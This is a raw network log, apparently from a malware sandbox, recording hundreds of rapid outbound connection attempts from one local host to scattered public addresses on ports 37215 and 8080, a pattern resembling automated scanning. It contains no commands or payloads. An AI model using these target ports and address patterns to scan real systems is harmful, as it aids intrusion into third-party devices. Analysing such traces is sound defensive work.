                                              Nov 23, 2023 05:14:48.997163057 CET4782823192.168.2.14152.15.24.240
                                              Nov 23, 2023 05:14:49.007285118 CET4783037215192.168.2.14197.9.157.243
                                              Nov 23, 2023 05:14:49.007294893 CET4783037215192.168.2.14197.182.24.67
                                              Nov 23, 2023 05:14:49.007301092 CET4783037215192.168.2.1441.52.145.21
                                              Nov 23, 2023 05:14:49.007308006 CET4783037215192.168.2.1441.100.213.15
                                              Nov 23, 2023 05:14:49.007308960 CET4783037215192.168.2.1441.102.126.158
                                              Nov 23, 2023 05:14:49.007308960 CET4783037215192.168.2.1441.166.182.48
                                              Nov 23, 2023 05:14:49.007308960 CET4783037215192.168.2.1441.174.7.136
                                              Nov 23, 2023 05:14:49.007311106 CET4783037215192.168.2.14197.162.137.134
                                              Nov 23, 2023 05:14:49.007316113 CET4783037215192.168.2.14197.127.42.125
                                              Nov 23, 2023 05:14:49.007316113 CET4783037215192.168.2.14197.112.108.175
                                              Nov 23, 2023 05:14:49.007319927 CET4783037215192.168.2.14156.198.250.225
                                              Nov 23, 2023 05:14:49.007319927 CET4783037215192.168.2.1441.26.176.93
                                              Nov 23, 2023 05:14:49.007328987 CET4783037215192.168.2.1441.247.43.233
                                              Nov 23, 2023 05:14:49.007333994 CET4783037215192.168.2.14197.46.167.1
                                              Nov 23, 2023 05:14:49.007335901 CET4783037215192.168.2.14156.52.89.64
                                              Nov 23, 2023 05:14:49.007345915 CET4783037215192.168.2.14156.167.182.16
                                              Nov 23, 2023 05:14:49.007349014 CET4783037215192.168.2.14197.102.11.207
                                              Nov 23, 2023 05:14:49.007349968 CET4783037215192.168.2.14197.84.156.73
                                              Nov 23, 2023 05:14:49.007352114 CET4783037215192.168.2.14156.76.15.192
                                              Nov 23, 2023 05:14:49.007352114 CET4783037215192.168.2.1441.31.159.254
                                              Nov 23, 2023 05:14:49.007364988 CET4783037215192.168.2.14197.34.239.2
                                              Nov 23, 2023 05:14:49.007364988 CET4783037215192.168.2.1441.117.43.150
                                              Nov 23, 2023 05:14:49.007365942 CET4783037215192.168.2.1441.219.37.65
                                              Nov 23, 2023 05:14:49.007370949 CET4783037215192.168.2.1441.197.119.50
                                              Nov 23, 2023 05:14:49.007375956 CET4783037215192.168.2.14197.177.161.109
                                              Nov 23, 2023 05:14:49.007379055 CET4783037215192.168.2.14197.102.63.245
                                              Nov 23, 2023 05:14:49.007379055 CET4783037215192.168.2.1441.61.128.162
                                              Nov 23, 2023 05:14:49.007388115 CET4783037215192.168.2.1441.120.44.246
                                              Nov 23, 2023 05:14:49.007392883 CET4783037215192.168.2.1441.193.195.219
                                              Nov 23, 2023 05:14:49.007392883 CET4783037215192.168.2.14197.134.2.29
                                              Nov 23, 2023 05:14:49.007405043 CET4783037215192.168.2.1441.118.193.219
                                              Nov 23, 2023 05:14:49.007405996 CET4783037215192.168.2.14156.201.140.198
                                              Nov 23, 2023 05:14:49.007416010 CET4783037215192.168.2.14156.151.145.172
                                              Nov 23, 2023 05:14:49.007424116 CET4783037215192.168.2.14156.170.187.119
                                              Nov 23, 2023 05:14:49.007425070 CET4783037215192.168.2.14197.111.209.163
                                              Nov 23, 2023 05:14:49.007424116 CET4783037215192.168.2.1441.42.96.0
                                              Nov 23, 2023 05:14:49.007427931 CET4783037215192.168.2.14197.59.199.70
                                              Nov 23, 2023 05:14:49.007437944 CET4783037215192.168.2.1441.197.68.142
                                              Nov 23, 2023 05:14:49.007438898 CET4783037215192.168.2.14197.42.27.145
                                              Nov 23, 2023 05:14:49.007438898 CET4783037215192.168.2.1441.86.123.214
                                              Nov 23, 2023 05:14:49.007452011 CET4783037215192.168.2.14156.103.45.191
                                              Nov 23, 2023 05:14:49.007452011 CET4783037215192.168.2.14156.20.83.101
                                              Nov 23, 2023 05:14:49.007452011 CET4783037215192.168.2.14197.88.6.176
                                              Nov 23, 2023 05:14:49.007452011 CET4783037215192.168.2.1441.194.81.187
                                              Nov 23, 2023 05:14:49.007452011 CET4783037215192.168.2.14197.95.242.74
                                              Nov 23, 2023 05:14:49.007452011 CET4783037215192.168.2.14156.193.152.119
                                              Nov 23, 2023 05:14:49.007458925 CET4783037215192.168.2.1441.197.87.26
                                              Nov 23, 2023 05:14:49.007460117 CET4783037215192.168.2.14156.144.46.98
                                              Nov 23, 2023 05:14:49.007463932 CET4783037215192.168.2.14197.115.212.212
                                              Nov 23, 2023 05:14:49.007472038 CET4783037215192.168.2.1441.137.244.55
                                              Nov 23, 2023 05:14:49.007476091 CET4783037215192.168.2.14156.39.184.28
                                              Nov 23, 2023 05:14:49.007481098 CET4783037215192.168.2.1441.100.202.42
                                              Nov 23, 2023 05:14:49.007481098 CET4783037215192.168.2.1441.203.104.126
                                              Nov 23, 2023 05:14:49.007481098 CET4783037215192.168.2.14197.110.222.118
                                              Nov 23, 2023 05:14:49.007481098 CET4783037215192.168.2.1441.82.119.174
                                              Nov 23, 2023 05:14:49.007481098 CET4783037215192.168.2.14197.112.14.183
                                              Nov 23, 2023 05:14:49.007491112 CET4783037215192.168.2.1441.97.186.47
                                              Nov 23, 2023 05:14:49.007491112 CET4783037215192.168.2.1441.120.247.108
                                              Nov 23, 2023 05:14:49.007492065 CET4783037215192.168.2.14197.217.150.206
                                              Nov 23, 2023 05:14:49.007492065 CET4783037215192.168.2.1441.4.154.94
                                              Nov 23, 2023 05:14:49.007494926 CET4783037215192.168.2.14156.52.13.109
                                              Nov 23, 2023 05:14:49.007507086 CET4783037215192.168.2.14156.93.73.7
                                              Nov 23, 2023 05:14:49.007508993 CET4783037215192.168.2.1441.103.247.94
                                              Nov 23, 2023 05:14:49.007518053 CET4783037215192.168.2.14156.220.113.46
                                              Nov 23, 2023 05:14:49.007524014 CET4783037215192.168.2.1441.52.195.232
                                              Nov 23, 2023 05:14:49.007524014 CET4783037215192.168.2.14197.176.4.247
                                              Nov 23, 2023 05:14:49.007527113 CET4783037215192.168.2.14197.56.222.230
                                              Nov 23, 2023 05:14:49.007536888 CET4783037215192.168.2.1441.233.241.175
                                              Nov 23, 2023 05:14:49.007538080 CET4783037215192.168.2.1441.123.187.0
                                              Nov 23, 2023 05:14:49.007538080 CET4783037215192.168.2.1441.234.114.137
                                              Nov 23, 2023 05:14:49.007546902 CET4783037215192.168.2.14156.162.85.90
                                              Nov 23, 2023 05:14:49.007548094 CET4783037215192.168.2.14197.140.216.129
                                              Nov 23, 2023 05:14:49.007553101 CET4783037215192.168.2.14156.154.95.72
                                              Nov 23, 2023 05:14:49.007553101 CET4783037215192.168.2.14197.66.131.189
                                              Nov 23, 2023 05:14:49.007554054 CET4783037215192.168.2.1441.28.146.254
                                              Nov 23, 2023 05:14:49.007554054 CET4783037215192.168.2.14197.62.93.237
                                              Nov 23, 2023 05:14:49.007565975 CET4783037215192.168.2.14197.250.137.10
                                              Nov 23, 2023 05:14:49.007565975 CET4783037215192.168.2.14156.100.63.234
                                              Nov 23, 2023 05:14:49.007565975 CET4783037215192.168.2.14156.164.148.5
                                              Nov 23, 2023 05:14:49.007566929 CET4783037215192.168.2.1441.211.138.239
                                              Nov 23, 2023 05:14:49.007565975 CET4783037215192.168.2.14156.104.189.233
                                              Nov 23, 2023 05:14:49.007565975 CET4783037215192.168.2.1441.116.94.109
                                              Nov 23, 2023 05:14:49.007565975 CET4783037215192.168.2.1441.249.178.78
                                              Nov 23, 2023 05:14:49.007567883 CET4783037215192.168.2.14156.18.68.250
                                              Nov 23, 2023 05:14:49.007567883 CET4783037215192.168.2.14197.154.39.223
                                              Nov 23, 2023 05:14:49.007567883 CET4783037215192.168.2.14156.122.157.194
                                              Nov 23, 2023 05:14:49.007570028 CET4783037215192.168.2.14156.65.247.224
                                              Nov 23, 2023 05:14:49.007569075 CET4783037215192.168.2.1441.187.108.21
                                              Nov 23, 2023 05:14:49.007569075 CET4783037215192.168.2.14156.167.34.44
                                              Nov 23, 2023 05:14:49.007569075 CET4783037215192.168.2.14156.34.224.149
                                              Nov 23, 2023 05:14:49.007582903 CET4783037215192.168.2.14197.15.152.228
                                              Nov 23, 2023 05:14:49.007582903 CET4783037215192.168.2.14197.74.215.255
                                              Nov 23, 2023 05:14:49.007586956 CET4783037215192.168.2.14156.133.253.224
                                              Nov 23, 2023 05:14:49.007587910 CET4783037215192.168.2.14197.25.254.45
                                              Nov 23, 2023 05:14:49.007606030 CET4783037215192.168.2.14156.232.178.34
                                              Nov 23, 2023 05:14:49.007627964 CET4783037215192.168.2.14156.182.138.179
                                              Nov 23, 2023 05:14:49.007632017 CET4783037215192.168.2.14156.165.216.221
                                              Nov 23, 2023 05:14:49.007632017 CET4783037215192.168.2.1441.146.38.187
                                              Nov 23, 2023 05:14:49.007632971 CET4783037215192.168.2.1441.77.146.207
                                              Nov 23, 2023 05:14:49.007642984 CET4783037215192.168.2.14156.231.254.160
                                              Nov 23, 2023 05:14:49.007648945 CET4783037215192.168.2.1441.84.151.7
                                              Nov 23, 2023 05:14:49.007658958 CET4783037215192.168.2.14156.23.140.173
                                              Nov 23, 2023 05:14:49.007663012 CET4783037215192.168.2.1441.55.179.76
                                              Nov 23, 2023 05:14:49.007663012 CET4783037215192.168.2.1441.151.211.222
                                              Nov 23, 2023 05:14:49.007663965 CET4783037215192.168.2.14156.221.220.104
                                              Nov 23, 2023 05:14:49.007675886 CET4783037215192.168.2.14156.126.224.69
                                              Nov 23, 2023 05:14:49.007675886 CET4783037215192.168.2.14156.220.215.176
                                              Nov 23, 2023 05:14:49.007687092 CET4783037215192.168.2.14156.182.10.67
                                              Nov 23, 2023 05:14:49.007692099 CET4783037215192.168.2.1441.24.63.105
                                              Nov 23, 2023 05:14:49.007693052 CET4783037215192.168.2.1441.29.77.179
                                              Nov 23, 2023 05:14:49.007698059 CET4783037215192.168.2.1441.199.207.251
                                              Nov 23, 2023 05:14:49.007698059 CET4783037215192.168.2.1441.137.130.27
                                              Nov 23, 2023 05:14:49.007698059 CET4783037215192.168.2.1441.149.113.137
                                              Nov 23, 2023 05:14:49.007700920 CET4783037215192.168.2.14197.116.190.141
                                              Nov 23, 2023 05:14:49.007703066 CET4783037215192.168.2.14197.69.25.156
                                              Nov 23, 2023 05:14:49.007703066 CET4783037215192.168.2.14156.42.250.227
                                              Nov 23, 2023 05:14:49.007704020 CET4783037215192.168.2.14197.20.112.167
                                              Nov 23, 2023 05:14:49.007708073 CET4783037215192.168.2.14197.246.8.235
                                              Nov 23, 2023 05:14:49.007720947 CET4783037215192.168.2.1441.251.89.8
                                              Nov 23, 2023 05:14:49.007721901 CET4783037215192.168.2.14197.67.7.153
                                              Nov 23, 2023 05:14:49.007723093 CET4783037215192.168.2.14156.9.112.118
                                              Nov 23, 2023 05:14:49.007729053 CET4783037215192.168.2.14197.107.112.123
                                              Nov 23, 2023 05:14:49.007729053 CET4783037215192.168.2.1441.50.202.244
                                              Nov 23, 2023 05:14:49.007759094 CET4783037215192.168.2.14197.145.109.192
                                              Nov 23, 2023 05:14:49.007762909 CET4783037215192.168.2.1441.134.112.171
                                              Nov 23, 2023 05:14:49.007762909 CET4783037215192.168.2.14156.219.78.67
                                              Nov 23, 2023 05:14:49.007766962 CET4783037215192.168.2.1441.252.98.207
                                              Nov 23, 2023 05:14:49.007766962 CET4783037215192.168.2.14197.41.159.43
                                              Nov 23, 2023 05:14:49.007767916 CET4783037215192.168.2.1441.21.182.46
                                              Nov 23, 2023 05:14:49.007775068 CET4783037215192.168.2.14156.170.42.10
                                              Nov 23, 2023 05:14:49.007782936 CET4783037215192.168.2.14197.119.245.247
                                              Nov 23, 2023 05:14:49.007783890 CET4783037215192.168.2.14197.154.137.49
                                              Nov 23, 2023 05:14:49.007783890 CET4783037215192.168.2.1441.84.50.20
                                              Nov 23, 2023 05:14:49.007783890 CET4783037215192.168.2.14156.126.49.254
                                              Nov 23, 2023 05:14:49.007783890 CET4783037215192.168.2.1441.83.186.179
                                              Nov 23, 2023 05:14:49.007786036 CET4783037215192.168.2.14197.140.146.230
                                              Nov 23, 2023 05:14:49.007786036 CET4783037215192.168.2.1441.28.91.227
                                              Nov 23, 2023 05:14:49.007786989 CET4783037215192.168.2.1441.64.148.81
                                              Nov 23, 2023 05:14:49.007786989 CET4783037215192.168.2.14197.137.62.99
                                              Nov 23, 2023 05:14:49.007786989 CET4783037215192.168.2.14156.195.68.9
                                              Nov 23, 2023 05:14:49.007786989 CET4783037215192.168.2.1441.223.229.63
                                              Nov 23, 2023 05:14:49.007787943 CET4783037215192.168.2.14156.1.243.177
                                              Nov 23, 2023 05:14:49.007786989 CET4783037215192.168.2.14156.95.131.151
                                              Nov 23, 2023 05:14:49.007797003 CET4783037215192.168.2.14156.6.109.4
                                              Nov 23, 2023 05:14:49.007805109 CET4783037215192.168.2.14197.140.200.209
                                              Nov 23, 2023 05:14:49.007807016 CET4783037215192.168.2.14156.64.72.214
                                              Nov 23, 2023 05:14:49.007807970 CET4783037215192.168.2.14156.130.69.167
                                              Nov 23, 2023 05:14:49.007817030 CET4783037215192.168.2.14197.104.246.254
                                              Nov 23, 2023 05:14:49.007817984 CET4783037215192.168.2.14156.146.104.245
                                              Nov 23, 2023 05:14:49.007823944 CET4783037215192.168.2.14156.74.199.94
                                              Nov 23, 2023 05:14:49.007833004 CET4783037215192.168.2.1441.247.168.229
                                              Nov 23, 2023 05:14:49.007833004 CET4783037215192.168.2.14197.197.81.53
                                              Nov 23, 2023 05:14:49.007841110 CET4783037215192.168.2.1441.150.98.136
                                              Nov 23, 2023 05:14:49.007843018 CET4783037215192.168.2.14197.12.158.255
                                              Nov 23, 2023 05:14:49.007848024 CET4783037215192.168.2.14156.166.49.198
                                              Nov 23, 2023 05:14:49.007849932 CET4783037215192.168.2.14156.183.22.4
                                              Nov 23, 2023 05:14:49.007874966 CET4783037215192.168.2.14156.214.98.39
                                              Nov 23, 2023 05:14:49.007879019 CET4783037215192.168.2.1441.77.231.92
                                              Nov 23, 2023 05:14:49.007992983 CET4783037215192.168.2.1441.131.75.47
                                              Nov 23, 2023 05:14:49.007992983 CET4783037215192.168.2.1441.184.33.139
                                              Nov 23, 2023 05:14:49.025024891 CET478168080192.168.2.1494.196.181.50
                                              Nov 23, 2023 05:14:49.025024891 CET478168080192.168.2.1495.0.1.6
                                              Nov 23, 2023 05:14:49.025049925 CET478168080192.168.2.1462.131.16.124
                                              Nov 23, 2023 05:14:49.025053024 CET478168080192.168.2.1431.236.17.228
                                              Nov 23, 2023 05:14:49.025070906 CET478168080192.168.2.1431.174.180.146
                                              Nov 23, 2023 05:14:49.025072098 CET478168080192.168.2.1495.125.237.230
                                              Nov 23, 2023 05:14:49.025075912 CET478168080192.168.2.1485.193.169.176
                                              Nov 23, 2023 05:14:49.025075912 CET478168080192.168.2.1462.116.186.141
                                              Nov 23, 2023 05:14:49.025077105 CET478168080192.168.2.1431.129.32.36
                                              Nov 23, 2023 05:14:49.025072098 CET478168080192.168.2.1494.118.183.42
                                              Nov 23, 2023 05:14:49.025075912 CET478168080192.168.2.1494.42.215.17
                                              Nov 23, 2023 05:14:49.025078058 CET478168080192.168.2.1485.1.232.64
                                              Nov 23, 2023 05:14:49.025084972 CET478168080192.168.2.1494.61.39.152
                                              Nov 23, 2023 05:14:49.025084972 CET478168080192.168.2.1462.160.70.243
                                              Nov 23, 2023 05:14:49.025084972 CET478168080192.168.2.1495.78.212.102
                                              Nov 23, 2023 05:14:49.025089025 CET478168080192.168.2.1494.206.90.199
                                              Nov 23, 2023 05:14:49.025099993 CET478168080192.168.2.1462.106.12.37
                                              Nov 23, 2023 05:14:49.025103092 CET478168080192.168.2.1462.14.245.72
                                              Nov 23, 2023 05:14:49.025103092 CET478168080192.168.2.1462.66.140.224
                                              Nov 23, 2023 05:14:49.025103092 CET478168080192.168.2.1462.232.220.89
                                              Nov 23, 2023 05:14:49.025113106 CET478168080192.168.2.1431.116.15.138
                                              Nov 23, 2023 05:14:49.025113106 CET478168080192.168.2.1431.207.164.9
                                              Nov 23, 2023 05:14:49.025113106 CET478168080192.168.2.1431.212.137.200
                                              Nov 23, 2023 05:14:49.025113106 CET478168080192.168.2.1495.12.177.205
                                              Nov 23, 2023 05:14:49.025113106 CET478168080192.168.2.1485.163.50.66
                                              Nov 23, 2023 05:14:49.025115013 CET478168080192.168.2.1485.200.169.135
                                              Nov 23, 2023 05:14:49.025115013 CET478168080192.168.2.1431.137.31.170
                                              Nov 23, 2023 05:14:49.025122881 CET478168080192.168.2.1431.144.153.179
                                              Nov 23, 2023 05:14:49.025122881 CET478168080192.168.2.1494.61.97.66
                                              Nov 23, 2023 05:14:49.025122881 CET478168080192.168.2.1485.75.5.66
                                              Nov 23, 2023 05:14:49.025122881 CET478168080192.168.2.1431.201.117.180
                                              Nov 23, 2023 05:14:49.025122881 CET478168080192.168.2.1485.5.216.67
                                              Nov 23, 2023 05:14:49.025127888 CET478168080192.168.2.1485.120.236.38
                                              Nov 23, 2023 05:14:49.025139093 CET478168080192.168.2.1495.200.92.145
                                              Nov 23, 2023 05:14:49.025139093 CET478168080192.168.2.1462.67.164.133
                                              Nov 23, 2023 05:14:49.025140047 CET478168080192.168.2.1485.156.173.69
                                              Nov 23, 2023 05:14:49.025139093 CET478168080192.168.2.1485.249.222.161
                                              Nov 23, 2023 05:14:49.025140047 CET478168080192.168.2.1462.146.236.160
                                              Nov 23, 2023 05:14:49.025140047 CET478168080192.168.2.1485.6.192.97
                                              Nov 23, 2023 05:14:49.025141954 CET478168080192.168.2.1462.118.44.27
                                              Nov 23, 2023 05:14:49.025141954 CET478168080192.168.2.1462.119.102.146
                                              Nov 23, 2023 05:14:49.025141954 CET478168080192.168.2.1462.33.213.117
                                              Nov 23, 2023 05:14:49.025141954 CET478168080192.168.2.1485.74.3.153
                                              Nov 23, 2023 05:14:49.025141954 CET478168080192.168.2.1494.215.79.235
                                              Nov 23, 2023 05:14:49.025141954 CET478168080192.168.2.1494.58.207.125
                                              Nov 23, 2023 05:14:49.025146008 CET478168080192.168.2.1485.8.176.121
                                              Nov 23, 2023 05:14:49.025147915 CET478168080192.168.2.1494.153.81.69
                                              Nov 23, 2023 05:14:49.025156975 CET478168080192.168.2.1494.121.244.70
                                              Nov 23, 2023 05:14:49.025187969 CET478168080192.168.2.1462.16.70.132
                                              Nov 23, 2023 05:14:49.025187969 CET478168080192.168.2.1462.224.50.25
                                              Nov 23, 2023 05:14:49.025201082 CET478168080192.168.2.1485.212.102.134
                                              Nov 23, 2023 05:14:49.025203943 CET478168080192.168.2.1431.186.55.191
                                              Nov 23, 2023 05:14:49.025203943 CET478168080192.168.2.1495.87.14.24
                                              Nov 23, 2023 05:14:49.025207996 CET478168080192.168.2.1431.215.128.151
                                              Nov 23, 2023 05:14:49.025229931 CET478168080192.168.2.1495.128.217.81
                                              Nov 23, 2023 05:14:49.025229931 CET478168080192.168.2.1462.182.95.239
                                              Nov 23, 2023 05:14:49.025238037 CET478168080192.168.2.1494.57.1.108
                                              Nov 23, 2023 05:14:49.025238991 CET478168080192.168.2.1485.148.106.184
                                              Nov 23, 2023 05:14:49.025248051 CET478168080192.168.2.1485.155.184.242
                                              Nov 23, 2023 05:14:49.025248051 CET478168080192.168.2.1494.216.147.214
                                              Nov 23, 2023 05:14:49.025315046 CET478168080192.168.2.1495.251.176.220
                                              Nov 23, 2023 05:14:49.025316954 CET478168080192.168.2.1485.18.129.162
                                              Nov 23, 2023 05:14:49.025316954 CET478168080192.168.2.1462.100.167.205
                                              Nov 23, 2023 05:14:49.025319099 CET478168080192.168.2.1485.122.182.182
                                              Nov 23, 2023 05:14:49.025378942 CET478168080192.168.2.1494.108.128.7
                                              Nov 23, 2023 05:14:49.025381088 CET478168080192.168.2.1485.238.153.90
                                              Nov 23, 2023 05:14:49.025382042 CET478168080192.168.2.1494.198.93.86
                                              Nov 23, 2023 05:14:49.025381088 CET478168080192.168.2.1495.0.181.243
                                              Nov 23, 2023 05:14:49.025430918 CET478168080192.168.2.1431.131.155.83
                                              Nov 23, 2023 05:14:49.025434971 CET478168080192.168.2.1495.213.248.46
                                              Nov 23, 2023 05:14:49.025437117 CET478168080192.168.2.1495.84.111.232
                                              Nov 23, 2023 05:14:49.025504112 CET478168080192.168.2.1495.14.8.50
                                              Nov 23, 2023 05:14:49.025509119 CET478168080192.168.2.1485.175.244.116
                                              Nov 23, 2023 05:14:49.025512934 CET478168080192.168.2.1494.75.246.175
                                              Nov 23, 2023 05:14:49.025544882 CET478168080192.168.2.1494.160.233.193
                                              Nov 23, 2023 05:14:49.025582075 CET478168080192.168.2.1495.135.199.213
                                              Nov 23, 2023 05:14:49.025598049 CET478168080192.168.2.1462.53.72.81
                                              Nov 23, 2023 05:14:49.025624990 CET478168080192.168.2.1494.122.104.168
                                              Nov 23, 2023 05:14:49.025638103 CET478168080192.168.2.1495.12.239.201
                                              Nov 23, 2023 05:14:49.025691986 CET478168080192.168.2.1495.160.229.198
                                              Nov 23, 2023 05:14:49.025716066 CET478168080192.168.2.1462.221.101.52
                                              Nov 23, 2023 05:14:49.025719881 CET478168080192.168.2.1462.169.119.196
                                              Nov 23, 2023 05:14:49.025733948 CET478168080192.168.2.1431.163.74.15
                                              Nov 23, 2023 05:14:49.025747061 CET478168080192.168.2.1494.51.7.224
                                              Nov 23, 2023 05:14:49.025747061 CET478168080192.168.2.1494.88.207.153
                                              Nov 23, 2023 05:14:49.025764942 CET478168080192.168.2.1494.135.217.129
                                              Nov 23, 2023 05:14:49.025765896 CET478168080192.168.2.1495.106.66.114
                                              Nov 23, 2023 05:14:49.025765896 CET478168080192.168.2.1462.174.168.90
                                              Nov 23, 2023 05:14:49.025770903 CET478168080192.168.2.1495.122.201.39
                                              Nov 23, 2023 05:14:49.025770903 CET478168080192.168.2.1495.161.66.198
                                              Nov 23, 2023 05:14:49.025774002 CET478168080192.168.2.1494.64.14.98
                                              Nov 23, 2023 05:14:49.025787115 CET478168080192.168.2.1462.148.219.10
                                              Nov 23, 2023 05:14:49.025794029 CET478168080192.168.2.1494.158.141.75
                                              Nov 23, 2023 05:14:49.025816917 CET478168080192.168.2.1494.122.6.45
                                              Nov 23, 2023 05:14:49.025860071 CET478168080192.168.2.1485.111.150.52
                                              Nov 23, 2023 05:14:49.025876045 CET478168080192.168.2.1485.33.208.220
                                              Nov 23, 2023 05:14:49.025882006 CET478168080192.168.2.1485.252.8.170
                                              Nov 23, 2023 05:14:49.025882006 CET478168080192.168.2.1485.187.195.28
                                              Nov 23, 2023 05:14:49.025898933 CET478168080192.168.2.1495.10.230.39
                                              Nov 23, 2023 05:14:49.025908947 CET478168080192.168.2.1485.65.4.121
                                              Nov 23, 2023 05:14:49.025908947 CET478168080192.168.2.1495.159.130.92
                                              Nov 23, 2023 05:14:49.025913000 CET478168080192.168.2.1462.35.93.182
                                              Nov 23, 2023 05:14:49.025953054 CET478168080192.168.2.1462.7.159.237
                                              Nov 23, 2023 05:14:49.025954008 CET478168080192.168.2.1495.243.49.209
                                              Nov 23, 2023 05:14:49.025954008 CET478168080192.168.2.1462.47.71.68
                                              Nov 23, 2023 05:14:49.025954962 CET478168080192.168.2.1462.236.27.34
                                              Nov 23, 2023 05:14:49.025954962 CET478168080192.168.2.1485.82.11.165
                                              Nov 23, 2023 05:14:49.025969028 CET478168080192.168.2.1494.123.174.207
                                              Nov 23, 2023 05:14:49.025969028 CET478168080192.168.2.1431.209.136.28
                                              Nov 23, 2023 05:14:49.025969028 CET478168080192.168.2.1462.130.160.7
                                              Nov 23, 2023 05:14:49.025974035 CET478168080192.168.2.1485.125.5.121
                                              Nov 23, 2023 05:14:49.025974035 CET478168080192.168.2.1462.48.23.75
                                              Nov 23, 2023 05:14:49.025984049 CET478168080192.168.2.1431.62.232.149
                                              Nov 23, 2023 05:14:49.025985003 CET478168080192.168.2.1485.97.148.229
                                              Nov 23, 2023 05:14:49.025985003 CET478168080192.168.2.1431.241.162.169
                                              Nov 23, 2023 05:14:49.025985003 CET478168080192.168.2.1485.2.71.86
                                              Nov 23, 2023 05:14:49.025985003 CET478168080192.168.2.1431.140.226.37
                                              Nov 23, 2023 05:14:49.025985956 CET478168080192.168.2.1485.9.232.124
                                              Nov 23, 2023 05:14:49.025985003 CET478168080192.168.2.1495.99.153.175
                                              Nov 23, 2023 05:14:49.025988102 CET478168080192.168.2.1462.233.11.2
                                              Nov 23, 2023 05:14:49.025988102 CET478168080192.168.2.1485.157.126.187
                                              Nov 23, 2023 05:14:49.025988102 CET478168080192.168.2.1495.176.57.140
                                              Nov 23, 2023 05:14:49.025988102 CET478168080192.168.2.1431.187.242.220
                                              Nov 23, 2023 05:14:49.026034117 CET478168080192.168.2.1431.198.80.78
                                              Nov 23, 2023 05:14:49.026063919 CET478168080192.168.2.1495.225.71.137
                                              Nov 23, 2023 05:14:49.026087999 CET478168080192.168.2.1495.58.236.85
                                              Nov 23, 2023 05:14:49.026106119 CET478168080192.168.2.1431.30.145.13
                                              Nov 23, 2023 05:14:49.026108027 CET478168080192.168.2.1431.52.15.128
                                              Nov 23, 2023 05:14:49.026108027 CET478168080192.168.2.1431.24.40.164
                                              Nov 23, 2023 05:14:49.026108980 CET478168080192.168.2.1431.164.104.199
                                              Nov 23, 2023 05:14:49.026120901 CET478168080192.168.2.1431.35.36.113
                                              Nov 23, 2023 05:14:49.026173115 CET478168080192.168.2.1485.153.23.24
                                              Nov 23, 2023 05:14:49.026173115 CET478168080192.168.2.1462.6.194.73
                                              Nov 23, 2023 05:14:49.026177883 CET478168080192.168.2.1495.226.201.222
                                              Nov 23, 2023 05:14:49.026177883 CET478168080192.168.2.1431.209.133.200
                                              Nov 23, 2023 05:14:49.026195049 CET478168080192.168.2.1494.178.140.8
                                              Nov 23, 2023 05:14:49.026243925 CET478168080192.168.2.1462.254.190.7
                                              Nov 23, 2023 05:14:49.026243925 CET478168080192.168.2.1462.60.203.16
                                              Nov 23, 2023 05:14:49.026259899 CET478168080192.168.2.1462.137.228.82
                                              Nov 23, 2023 05:14:49.026281118 CET478168080192.168.2.1495.190.210.244
                                              Nov 23, 2023 05:14:49.026281118 CET478168080192.168.2.1495.101.14.220
                                              Nov 23, 2023 05:14:49.026281118 CET478168080192.168.2.1495.53.197.205
                                              Nov 23, 2023 05:14:49.026282072 CET478168080192.168.2.1431.165.111.245
                                              Nov 23, 2023 05:14:49.026281118 CET478168080192.168.2.1494.245.142.38
                                              Nov 23, 2023 05:14:49.026281118 CET478168080192.168.2.1495.245.41.216
                                              Nov 23, 2023 05:14:49.026282072 CET478168080192.168.2.1485.230.18.240
                                              Nov 23, 2023 05:14:49.026281118 CET478168080192.168.2.1494.103.245.71
                                              Nov 23, 2023 05:14:49.026316881 CET478168080192.168.2.1494.197.8.81
                                              Nov 23, 2023 05:14:49.026316881 CET478168080192.168.2.1485.104.110.92
                                              Nov 23, 2023 05:14:49.026318073 CET478168080192.168.2.1495.24.185.241
                                              Nov 23, 2023 05:14:49.026318073 CET478168080192.168.2.1485.101.122.65
                                              Nov 23, 2023 05:14:49.026336908 CET478168080192.168.2.1494.160.61.159
                                              Nov 23, 2023 05:14:49.026336908 CET478168080192.168.2.1495.186.201.225
                                              Nov 23, 2023 05:14:49.026365995 CET478168080192.168.2.1431.131.208.99
                                              Nov 23, 2023 05:14:49.026374102 CET478168080192.168.2.1494.165.203.192
                                              Nov 23, 2023 05:14:49.026382923 CET478168080192.168.2.1485.223.96.148
                                              Nov 23, 2023 05:14:49.026437044 CET478168080192.168.2.1494.134.29.10
                                              Nov 23, 2023 05:14:49.026447058 CET478168080192.168.2.1485.20.93.171
                                              Nov 23, 2023 05:14:49.026448011 CET478168080192.168.2.1462.129.240.129
                                              Nov 23, 2023 05:14:49.026448011 CET478168080192.168.2.1431.244.251.21
                                              Nov 23, 2023 05:14:49.026452065 CET478168080192.168.2.1494.48.61.208
                                              Nov 23, 2023 05:14:49.026468992 CET478168080192.168.2.1494.22.179.223
                                              Nov 23, 2023 05:14:49.026468992 CET478168080192.168.2.1485.177.161.243
                                              Nov 23, 2023 05:14:49.026473045 CET478168080192.168.2.1462.16.68.214
                                              Nov 23, 2023 05:14:49.026473999 CET478168080192.168.2.1495.99.254.243
                                              Nov 23, 2023 05:14:49.026479006 CET478168080192.168.2.1494.236.158.150
                                              Nov 23, 2023 05:14:49.026479006 CET478168080192.168.2.1495.138.105.208
                                              Nov 23, 2023 05:14:49.026490927 CET478168080192.168.2.1495.180.184.180
                                              Nov 23, 2023 05:14:49.026515007 CET478168080192.168.2.1495.213.244.215
                                              Nov 23, 2023 05:14:49.026551008 CET478168080192.168.2.1462.222.102.225
                                              Nov 23, 2023 05:14:49.026551008 CET478168080192.168.2.1495.58.70.242
                                              Nov 23, 2023 05:14:49.026551008 CET478168080192.168.2.1494.167.50.117
                                              Nov 23, 2023 05:14:49.026570082 CET478168080192.168.2.1431.100.154.147
                                              Nov 23, 2023 05:14:49.026571989 CET478168080192.168.2.1494.82.76.196
                                              Nov 23, 2023 05:14:49.026578903 CET478168080192.168.2.1494.58.182.240
                                              Nov 23, 2023 05:14:49.026588917 CET478168080192.168.2.1494.229.157.168
                                              Nov 23, 2023 05:14:49.026590109 CET478168080192.168.2.1495.57.60.206
                                              Nov 23, 2023 05:14:49.026613951 CET478168080192.168.2.1495.64.65.88
                                              Nov 23, 2023 05:14:49.026614904 CET478168080192.168.2.1462.231.139.112
                                              Nov 23, 2023 05:14:49.026634932 CET478168080192.168.2.1494.176.9.40
                                              Nov 23, 2023 05:14:49.026684999 CET478168080192.168.2.1485.20.117.117
                                              Nov 23, 2023 05:14:49.026684999 CET478168080192.168.2.1494.87.141.148
                                              Nov 23, 2023 05:14:49.026684999 CET478168080192.168.2.1495.119.128.105
                                              Nov 23, 2023 05:14:49.026691914 CET478168080192.168.2.1494.188.134.221
